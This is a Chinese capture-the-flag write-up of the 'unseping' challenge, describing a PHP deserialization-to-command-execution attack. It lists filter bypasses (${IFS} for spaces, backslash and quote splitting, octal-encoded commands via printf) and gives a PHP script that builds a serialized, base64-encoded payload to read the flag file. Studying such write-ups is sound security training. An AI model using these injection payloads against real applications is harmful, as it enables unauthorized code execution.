unseping

很明显一个反序列化进行的RCE

但是中间的坑很多

本来想着桡过wakeup函数，但是没有绕过，

可能是php版本比较高

于是绕着过滤硬上，发现过滤还好不是很多

空格过滤了用 %09（tab）（这个在这个环境中好像不行）或 ${IFS}

命令过滤了用 \ 或 ""

可以发现flag存在的文件夹但是 / &被过滤了

<?php   
class ease{
    
    //private $method;
    //private $args;
    public $method;
    public $args;
    function __construct() {
        $this->method = "ping";
       $this->args = array('$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")');
       //$this->args = array('ls');
        
    }
}
$a = new ease();
$a = serialize($a);
echo $a;
echo "\n";
echo base64_encode($a);
?>

这里用oct编码绕过

标签：146,141,echo,61,过滤,137,unseping
From： https://www.cnblogs.com/yhchen-blogs/p/16930959.html

攻防世界-unseping
题目<?phphighlight_file(__FILE__);classease{private$method;private$args;function__construct($method,$args){$this->metho......
江苏工匠杯unseping（反序列化+Linux命令执行{$(printf '\154\163')}）
<?phphighlight_file(__FILE__);classease{private$method;private$args;function__construct($method,$args){$this->method=$m......

unseping

unseping

相关文章

赞助商

阅读排行